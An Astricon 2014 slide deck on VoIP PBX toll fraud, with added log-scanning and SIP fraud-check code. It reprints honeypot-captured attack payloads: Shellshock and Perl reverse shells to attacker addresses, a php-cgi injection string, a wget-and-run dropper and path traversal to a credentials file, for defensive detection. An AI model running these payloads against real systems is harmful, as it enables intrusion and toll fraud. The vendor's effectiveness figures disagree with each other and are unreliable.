No More Fraud, Astricon, Las Vegas 2014
No More Fraud! 
Let’s say “enough is enough”
About me 
Flavio E. Goncalves 
CTO of SipPulse (www.sippulse.com) 
Turnkey solutions for VoIP providers and Telcos. 
Anti-Fraud Solutions
Why should you care?
Exposure for a single T1 line: 43,200 min/month × US$5/min × 23 channels (a T1 PRI carries 23 bearer channels)
= US$4,968,000 per month
How they do it
#1 Allocate a number and a recording at a premium-rate number (PRN) provider
#2 Find a vulnerable device, using Shodan
#3 Make calls to that number and cash out
Intelligence gathered from honeypots
Distribution by country

Country | Count
US      | 117636
FR      | 105603
DE      | 78656
PS      | 32795
RU      | 11910
TW      | 11120
SC      | 10702
SG      | 3736
GB      | 2836
CA      | 1978
Top prefixes
+972 Palestine (+972 is the Israel country code, also used for the Palestinian territories; +970 is the dedicated Palestine code)
+44 Great Britain
+86 China
+20 Egypt
Top 5 PBX exploits in September/October 2014
1. Shellshock
2. PHP/LAMP injection
3. SQL injection in Trixbox
4. Linksys remote code execution
5. FreePBX remote code execution
#1 Shellshock
• Exploit date: 09/2014
• Specimen:
• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
• The payload travels in the User-Agent header, which the web server exports as an environment variable to CGI scripts; a vulnerable bash executes the command that follows the function definition, here an interactive reverse shell to 195.225.34.14:3333.
#2 SQL injection in Trixbox
• Exploit date: 03/2014 - http://www.exploit-db.com/exploits/32239/
• Specimen:
• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys remote code execution
• Exploit date: 02/2014 - http://www.exploit-db.com/exploits/31683/
• Specimen:
• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP attacks
• Apache/PHP remote exploit: php-cgi argument injection (CVE-2012-1823), where the query string is parsed as php-cgi command-line flags
• Exploit date: 10/2013
• Specimen (decoded):
• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
• Specimen (as logged, URL-encoded):
• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
• With auto_prepend_file=php://input, whatever the attacker puts in the POST body is executed as PHP; the encoded form exists only to slip past naive string matches on "-d".
#5 CallMeNum (demo)
• Exploit date: 03/2012
• Specimen:
• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes\n
  Application: system\n
  Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'
• The line breaks injected into callmenum are passed through to the Originate request the page sends to the Asterisk manager interface, so the attacker-supplied Application/Data lines run a Perl reverse shell to x.y.z.w:4446 (x.y.z.w stands for the attacker's address).
Unknown exploits
• Jul/2014
• Specimen:
[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
[03/Jul/2014] "GET /fuxkkk.php
[03/Jul/2014] "GET /recordings/theme/alexpass.php
• None of these paths exist in a stock install; a 200 response to one of them means the file was planted earlier and the box is already compromised.
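Every specimen above is visible in the web server's access log, so the cheapest detection is a signature pass over that log. The following is an added example written for this page (it is not code from the slides or from SipPulse/TFPS): it parses combined-format lines, URL-decodes the request line and User-Agent, matches the patterns the specimens show (the Shellshock function definition, php-cgi "-d" flags, the Trixbox, FreePBX, Vtiger and FreeSWITCH paths) and pulls the reverse-shell or dropper callback address out of the payload. The log lines it runs on are constructed from the slide's specimens; the client IPs in 198.51.100.0/24 are made up where the slide shows none.

```python
"""Signature pass over a web server access log for the PBX exploits above.

Added example (not from the slides or from SipPulse/TFPS). The patterns are
taken from the specimens on this page; the sample lines are constructed from
them, with made-up client IPs from 198.51.100.0/24 where the slide shows none.
"""
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# (name, field to inspect, pattern). Fields are URL-decoded before matching, so the
# %2D%64 form of the php-cgi attack hits the same rule as the plain "-d" form.
SIGNATURES = [
    ("shellshock", "ua", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("php-cgi-argument-injection", "request",
     re.compile(r"/php5?\?.*-d\s+(allow_url_include|auto_prepend_file)", re.I)),
    ("trixbox-webmeetme-sqli", "request", re.compile(r"/web-meetme/conf_cdr\.php\?bookId=", re.I)),
    ("linksys-tmunblock", "request", re.compile(r"/tmUnblock\.cgi", re.I)),
    ("freepbx-callme", "request", re.compile(r"/recordings/misc/callme_page\.php\?.*callmenum=", re.I)),
    ("freepbx-config-api-system", "request",
     re.compile(r"/admin/config\.php\?.*handler=api.*function=system", re.I)),
    ("freepbx-footer-injection", "request", re.compile(r"/admin/footer\.php\?php=", re.I)),
    ("vtiger-path-traversal", "request", re.compile(r"/vtigercrm/.*\.\./", re.I)),
    ("freeswitch-provision-harvest", "request",
     re.compile(r"/freeswitch/app/provision/index\.php\?mac=", re.I)),
    # payload-level rule: catches the reverse shell or dropper whatever the entry point was
    ("reverse-shell-payload", "both", re.compile(r"/dev/tcp/|IO::Socket::INET|wget\s+http", re.I)),
]

# ip:port or ip/port inside a payload, e.g. /dev/tcp/195.225.34.14/3333 or http://93.170.130.201:3003/e
CALLBACK_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[:/](\d{2,5})\b")


def classify(line):
    """Parse one log line; None if it is not combined format, else a dict with the signature hits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request = unquote_plus(m.group("request"))
    ua = unquote_plus(m.group("ua"))
    fields = {"request": request, "ua": ua, "both": request + " " + ua}
    hits = [name for name, where, pat in SIGNATURES if pat.search(fields[where])]
    return {"ip": m.group("ip"), "time": m.group("time"), "status": int(m.group("status")),
            "request": request, "ua": ua, "hits": hits}


def callback_endpoint(text):
    """Extract the attacker's listener (ip, port) from a decoded payload, if there is one."""
    m = CALLBACK_RE.search(text)
    return (m.group(1), int(m.group(2))) if m else None


def scan(lines):
    """Return one finding per line that matched at least one signature."""
    findings = []
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            rec["callback"] = callback_endpoint(rec["request"] + " " + rec["ua"])
            findings.append(rec)
    return findings


SAMPLE_LOG = [  # constructed from the slide specimens; 198.51.100.x client IPs are made up
    '198.51.100.10 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" '
    '"() { :;}; /bin/bash -c \'/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1\'"',
    '198.51.100.11 - - [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" '
    '404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7"',
    '198.51.100.12 - - [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"',
    '198.51.100.13 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C'
    '%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D'
    '%70%68%70%3A%2F%2F%69%6E%70%75%74 HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)"',
    '198.51.100.13 - - [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api'
    '&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e'
    ' HTTP/1.1" 404 534 "-" "-"',
    '108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/'
    'sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"',
    '198.51.100.14 - - [03/Jul/2014:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["hits"], f["callback"])
```

Decoding before matching matters: the php-cgi specimen on the slide was logged fully percent-encoded, and the FreePBX and Vtiger ones use %20 and %00. The callback address is worth extracting because it is the one indicator that survives across entry points: the same listener shows up in the Shellshock, footer.php and config.php payloads on these slides.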
Still uncommon (protocols and ports rarely attacked so far)
• Manager port (AMI) - 5038
• H.323 - 1720
• MGCP - 5036 (as on the slide; the MGCP standard ports are UDP 2427 for gateways and 2727 for call agents)
• TFTP - 69
• IAX2 - 4569
How hackers are getting into your PBX
• #1 - SIP brute force (fail2ban is effective)
• #2 - HTTP exploitation
• #3 - Attacks on phones
• #4 - Caller ID spoofing
• #5 - Billing/credit card fraud
Part III - How to defend
#1 Patch everything and upgrade frequently
#2 Use a firewall
#3 Use a Session Border Controller
#4 Use encryption
#5 Use an anti-fraud system
#1 Patch everything, update frequently
• Effectiveness: Low
• Risk: High
• Cost: High
#2 Use a firewall or configure iptables properly
• Effectiveness: High
• Risk: Medium
• Cost: Low
• Absolutely a must do. At the very least: no Internet access to SSH, no Internet access to HTTP/HTTPS (the management interfaces every exploit above arrives through).
• Does not prevent attacks on phones.
#3 Use a Session Border Controller 
• Effectiveness: Medium 
• Risk: Medium 
• Cost: Very High
#4 Use encryption
• Effectiveness: Medium
• Risk: Medium
• Cost: High if you intend to do mutual authentication
#5 Use an anti-fraud system
• Effectiveness: High
• Risk: Very low
• Cost: Medium
• Comments: can detect 99.999% of the attacks; protects against caller ID spoofing, social engineering and phone attacks.
• Limitations: firewall restrictions are still required, otherwise an attacker on the box can tamper with the anti-fraud rules.
Working together in 2 steps
1. Make sure your customer's firewall and fail2ban are configured right (you)
2. Partner with us to use TFPS on your customers (us)
Fraud Prevention for All 
www.tfps.co
How effective is an anti-fraud solution?
• 99.989% just by protocol signature.
• Number obtained by comparing the attacks registered on the honeypot against the rules.
[Pie chart: Anti-Fraud Effectiveness, detected vs. undetected]
www.tfps.co || tfps.sippulse.com
1. 99.89% of the attacks prevented by signature detection
2. Collaborative protection: one PBX hacked automatically blocks the IP for the others
3. Mechanism: SIP redirect
• No additional hardware required.
• Available for OpenSIPS/FreeSWITCH/Asterisk
Asterisk Code
[from-internal] ; set this to the context your users are in
; FPS for international calls: send the call to the fraud-prevention service (FPS)
; with the caller's source IP, user agent and concurrent-call count in private headers
exten => _011[1-9].,1,Set(ip=${CHANNEL(recvip)})
 same => n,SIPAddHeader(P-Received: ${ip})
 same => n,Set(ua=${CHANNEL(useragent)})
 same => n,SIPAddHeader(P-UA: ${ua})
 same => n,Set(GROUP()=fps)
 same => n,Set(ncalls=${GROUP_COUNT(fps)})
 same => n,SIPAddHeader(P-Calls: ${ncalls})
 same => n,Set(_original=${EXTEN}) ; leading underscore: inherited by the channel created after the redirect
 same => n,Dial(SIP/fps/${EXTEN:2}) ; the offset strips the dialled prefix; set it to what your FPS trunk expects

Asterisk Code
[fps] ; context of the "fps" peer: the service answers with a 302 whose Contact user is R<number> (rejected) or A<number> (approved)
; For calls not approved
exten => _R.,1,Answer()
 same => n,Playback(unauthorized) ; customize here to play an error message
 same => n,Hangup(21) ; cause 21: call rejected
; For calls approved
exten => _A.,1,Answer()
 same => n,Dial(SIP/provider/${original}) ; customize here to send the call ahead
 same => n,Hangup(16) ; cause 16: normal call clearing
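To make the redirect exchange concrete, here is an added example of the service side, written for this page; it is not TFPS code, and the rules it applies are invented for the illustration, not the product's. It assumes what the dialplan above implies: the service receives the INVITE carrying P-Received, P-UA and P-Calls, answers 302 Moved Temporarily, and signals its verdict in the Contact user part as A<number> or R<number>, which the [fps] context then matches with _A. and _R.. The decision rules (scanner user agents, a concurrent-call cap, a per-customer source-network allow-list and a destination prefix block-list), the host name fps.example.net and all addresses are assumptions.

```python
"""Fraud decision for the SIP-redirect mechanism shown in the dialplan.

Added example, not TFPS code. Assumed contract: the PBX sends an INVITE with
P-Received / P-UA / P-Calls; the service replies 302 whose Contact user part
is 'A' + number (approved) or 'R' + number (rejected). Rules and addresses
are made up for the example.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# User agents of common SIP scanners and brute-forcers (sipvicious announces
# itself as "friendly-scanner"); a real service keeps this list current.
SCANNER_UA = re.compile(r"friendly-scanner|sipvicious|sipcli|sip-scan", re.I)


@dataclass
class Policy:
    """Per-customer rules; every value here is an assumed example setting."""
    max_concurrent: int = 3           # international calls allowed at once
    allowed_sources: list = field(    # where the customer's phones really live
        default_factory=lambda: [ipaddress.ip_network("203.0.113.0/24")])
    blocked_prefixes: tuple = ("870", "881", "882")  # satellite/international networks, high cost


def parse_invite(raw):
    """Return (request-URI user, lower-cased header dict) for a raw INVITE."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"INVITE sip:(?P<user>[^@;>]+)@", lines[0])
    if not m:
        raise ValueError("not an INVITE request line: " + lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group("user"), headers


def decide(number, headers, policy):
    """Return ('A' | 'R', reason). Rules run cheapest first; the first hit wins."""
    if SCANNER_UA.search(headers.get("p-ua", "")):
        return "R", "scanner user-agent"
    try:
        ncalls = int(headers.get("p-calls", "1"))
    except ValueError:
        return "R", "malformed P-Calls"
    if ncalls > policy.max_concurrent:
        return "R", f"{ncalls} concurrent international calls"
    try:
        src = ipaddress.ip_address(headers.get("p-received", ""))
    except ValueError:
        return "R", "missing or invalid P-Received"
    if not any(src in net for net in policy.allowed_sources):
        return "R", f"source {src} outside customer network"
    if number.startswith(policy.blocked_prefixes):
        return "R", "blocked destination prefix"
    return "A", "ok"


def handle_invite(raw, policy, host="fps.example.net"):
    """Build the 302 the PBX will follow. Returns (response, verdict, reason)."""
    number, h = parse_invite(raw)
    verdict, reason = decide(number, h, policy)
    response = (
        "SIP/2.0 302 Moved Temporarily\r\n"
        f"Via: {h.get('via', '')}\r\n"
        f"From: {h.get('from', '')}\r\n"
        f"To: {h.get('to', '')};tag=fps{verdict}\r\n"
        f"Call-ID: {h.get('call-id', '')}\r\n"
        f"CSeq: {h.get('cseq', '')}\r\n"
        f"Contact: <sip:{verdict}{number}@{host}>\r\n"   # A<number> or R<number>
        "Content-Length: 0\r\n\r\n"
    )
    return response, verdict, reason


def build_invite(number, received, ua, ncalls):
    """Constructed INVITE in the shape the from-internal dialplan produces."""
    return (
        f"INVITE sip:{number}@fps.example.net SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 203.0.113.5:5060;branch=z9hG4bK-example\r\n"
        "From: <sip:1001@203.0.113.5>;tag=1001\r\n"
        f"To: <sip:{number}@fps.example.net>\r\n"
        "Call-ID: example-call-1@203.0.113.5\r\n"
        "CSeq: 1 INVITE\r\n"
        f"P-Received: {received}\r\n"
        f"P-UA: {ua}\r\n"
        f"P-Calls: {ncalls}\r\n"
        "Content-Length: 0\r\n\r\n"
    )


if __name__ == "__main__":
    policy = Policy()
    for args in [("442071234567", "203.0.113.42", "Yealink SIP-T22P 7.60.0.70", 1),
                 ("442071234567", "203.0.113.42", "friendly-scanner", 1),
                 ("442071234567", "203.0.113.42", "Yealink SIP-T22P 7.60.0.70", 9),
                 ("442071234567", "198.51.100.9", "Yealink SIP-T22P 7.60.0.70", 1),
                 ("88216012345", "203.0.113.42", "Yealink SIP-T22P 7.60.0.70", 1)]:
        _, verdict, reason = handle_invite(build_invite(*args), policy)
        print(args[0], args[1], verdict, reason)
```

Two things about the exchange are worth keeping in mind. First, with chan_sip the PBX follows a 302 by dialling the Contact user as an extension in the context configured for the fps peer (unless promiscredir is set), which is exactly why the [fps] context carries the _A. and _R. patterns and why the _original variable has to be inheritable. Second, the P-Received and P-Calls headers are only as trustworthy as the path between the PBX and the service: the slide's point that the firewall must stay in place is precisely so nobody on the box can rewrite them.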
Beyond blacklists: comparing to other anti-fraud solutions
• Pluggable
• No additional hardware
• Small amount of traffic to be analyzed
• Small risk: only a few calls can be affected
• Easy handling of outages
Anti-fraud how-to (demo)
Thank You! 
• e-mail: flavio@sippulse.com 
• skype: flaviogoncalves1 
• Twitter: @asteriskguide 
• blog.tfps.co
Backup Slides
#6 FreePBX 2.x code execution
• Specimen:
• [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
• Decoded args: cd /tmp; rm -f e; wget http://93.170.130.201:3003/e; perl e; rm -f e (fetch a Perl dropper, run it, delete it). This is the unauthenticated config.php handler=api bug, CVE-2014-1903.
#4 Vtiger exploit (lots of variations)
• 0001189: Vtiger CRM - PHP inject vulnerability
• Specimen:
• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"
• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
• The first request is a path traversal (null byte appended to cut off the expected suffix) aimed at /etc/amportal.conf, the FreePBX configuration file that holds the database and manager (AMI) credentials.
#4 PHP code injection vulnerability
• Specimen (as logged):
• [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-"
• Decoded:
• "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'
• Same Perl reverse shell as the CallMeNum specimen, this time delivered through the ip parameter of footer.php and calling back to 93.170.130.201:3333.
#9 FreePBX extension dump exploitation
• Specimen:
• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
#6 FreeSWITCH attacks
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
• Probing the phone-provisioning script with a bogus MAC address: a provisioning template that answers contains the SIP account credentials the phone would be configured with.
#4 Caller ID spoofing
• 1 - Send 1 million calls and cancel them
• 2 - Fake the caller ID to a PRN
• 3 - Wait for the call back (the victims return the missed call to the premium-rate number)
Open Source is a Target! 
•We are seeing scans for: 
• Vicidial 
• Astpp 
• phpMyAdmin (hot) 
• Tomcat 
• Jboss 
• FreeSwitch
First way to protect
1. Make sure your system is protected by a firewall
   1. Vulnerability scan
   2. Apply firewall rules to prevent unauthorized access to the server
   3. Use .htaccess and implement dual authentication (a web-server login in front of the application's own login)
#5 SIP phone recent vulnerabilities (CVSS score in parentheses)
• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)
• Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)
• Cisco SPA 3XX, 5XX - http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427/
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/

No More Fraud, Astricon, Las Vegas 2014

  • 1. No More Fraud! Let’s say “enough is enough”
  • 2. About me: Flavio E. Goncalves, CTO of SipPulse (www.sippulse.com). Turnkey solutions for VoIP providers and telcos; anti-fraud solutions.
  • 3. Why you should care: the exposure of a single T1 line. 43,200 min/month at US$5/min on 23 channels is US$4,968,000.
  • 4. How they do it: #1 allocate a number and a recording at a premium-rate number (PRN) provider; #2 find a vulnerable device (using Shodan); #3 make calls to that number and cash out.
  • 6. Distribution by country (attacks seen by the honeypots): US 117,636; FR 105,603; DE 78,656; PS 32,795; RU 11,910; TW 11,120; SC 10,702; SG 3,736; GB 2,836; CA 1,978.
  • 7. Top destination prefixes: +972 (Israel/Palestine), +44 Great Britain, +86 China, +20 Egypt.
  • 8. Top 5 PBX exploits in September/October: 1. Shellshock; 2. PHP/LAMP injection; 3. SQL injection in Trixbox; 4. Linksys remote code execution; 5. FreePBX remote code execution.
  • 9. #1 Shellshock (CVE-2014-6271). Exploit date: 09/2014. Specimens (the payload sits in the User-Agent header and opens a reverse shell back to the attacker):
      [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
      [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
  • 10. #2 SQL injection in Trixbox (web-meetme). Exploit date: 03/2014 - http://www.exploit-db.com/exploits/32239/. Specimen:
      [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
  • 11. #3 Linksys remote code execution. Exploit date: 02/2014 - http://www.exploit-db.com/exploits/31683/. Specimen:
      [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
  • 12. #4 LAMP attacks: Apache/PHP remote exploit (PHP-CGI query-string argument injection, CVE-2012-1823). Exploit date: 10/2013. Decoded specimen; -d auto_prepend_file=php://input makes php-cgi execute the POST body as PHP:
      POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
    As logged (percent-encoded, so a signature has to decode before matching):
      [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
  • 13. #5 CallMeNum (demo). Exploit date: 03/2012. The callmenum value is copied into an AMI Originate; the injected line breaks add an Application/Data pair, so the manager runs the attacker's command (here a Perl reverse shell). Specimen:
      GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n
      Application: system
      Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'
  • 14. Unknown exploits (Jul/2014). Specimens:
      [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
      [03/Jul/2014] "GET /fuxkkk.php
      [03/Jul/2014] "GET /recordings/theme/alexpass.php
  • 15. Still uncommon (attacks on other PBX services): manager port (AMI) 5038, H.323 1720, MGCP 5036, TFTP 69, IAX2 4569.
  • 16. How hackers are getting into your PBX: #1 SIP brute force (fail2ban is effective); #2 HTTP exploitation; #3 attacks on phones; #4 caller ID spoofing; #5 billing / credit card fraud.
  • 17. Part III: How to defend. #1 patch everything and upgrade frequently; #2 use a firewall; #3 use a session border controller; #4 use encryption; #5 use an anti-fraud system.
  • 18. #1 Patch everything, update frequently. Effectiveness: low. Risk: high. Cost: high.
  • 19. #2 Use a firewall, or configure iptables properly. Effectiveness: high. Risk: medium. Cost: low. Absolutely a must: at the very least, no Internet access to SSH and no Internet access to HTTP/HTTPS. Does not prevent attacks on the phones.
  • 20. #3 Use a session border controller. Effectiveness: medium. Risk: medium. Cost: very high.
  • 21. #4 Use encryption. Effectiveness: medium. Risk: medium. Cost: high if you intend to do mutual authentication.
  • 22. #5 Use an anti-fraud system. Effectiveness: high. Risk: very low. Cost: medium. Comments: can detect 99.999% of the attacks; protects against caller ID spoofing, social engineering and phone attacks. Limitation: firewall restrictions are still required so that the anti-fraud rules themselves cannot be tampered with.
  • 23. Working together in 2 steps: 1. make sure your customer’s firewall and fail2ban are configured right (you); 2. partner with us to run TFPS for your customers (us).
  • 24. Fraud prevention for all: www.tfps.co
  • 25. How effective an anti-fraud solution is: 99.989% just by protocol signature. The number was obtained by comparing the attacks recorded on the honeypot against the rules. [Pie chart: Anti-Fraud Effectiveness, detected vs. undetected]
  • 26. www.tfps.co || tfps.sippulse.com. 1. 99.89% of the attacks prevented by signature detection. 2. Collaborative protection: one PBX hacked automatically blocks the IP for the others. 3. Mechanism: SIP redirect. No additional hardware required. Available for OpenSIPS/FreeSWITCH/Asterisk.
  • 27. Asterisk code, PBX side of the check (the dialplan sends international calls to the fps SIP peer with three extra headers; this assumes the fps peer in sip.conf has context=fps so the 302 redirect lands in the context on the next slide):
      [from-internal] ; set this to the context your users dial from
      ; FPS check for international calls
      exten => _011[1-9].,1,Set(ip=${CHANNEL(recvip)})      ; IP address the INVITE came from (chan_sip)
       same => n,SIPAddHeader(P-Received: ${ip})
       same => n,Set(ua=${CHANNEL(useragent)})              ; the phone's User-Agent string
       same => n,SIPAddHeader(P-UA: ${ua})
       same => n,Set(GROUP()=fps)                           ; count the concurrent calls going through the check
       same => n,Set(ncalls=${GROUP_COUNT(fps)})
       same => n,SIPAddHeader(P-Calls: ${ncalls})
       same => n,Set(_original=${EXTEN})                    ; leading underscore: inherited by the channel the redirect creates
       same => n,Dial(SIP/fps/${EXTEN:2})                   ; ${EXTEN:2} drops two leading digits; confirm the number format the service expects
  • 28. Asterisk code, the context the redirect lands in (the 302 Contact user is R<number> for rejected or A<number> for approved calls):
      [fps]
      ; calls not approved
      exten => _R.,1,Answer()
       same => n,Playback(unauthorized)                     ; customize here to generate an error message
       same => n,Hangup(21)                                 ; cause 21: call rejected
      ; calls approved
      exten => _A.,1,Answer()
       same => n,Dial(SIP/provider/${original})             ; customize here to send the call ahead
       same => n,Hangup(16)                                 ; cause 16: normal clearing
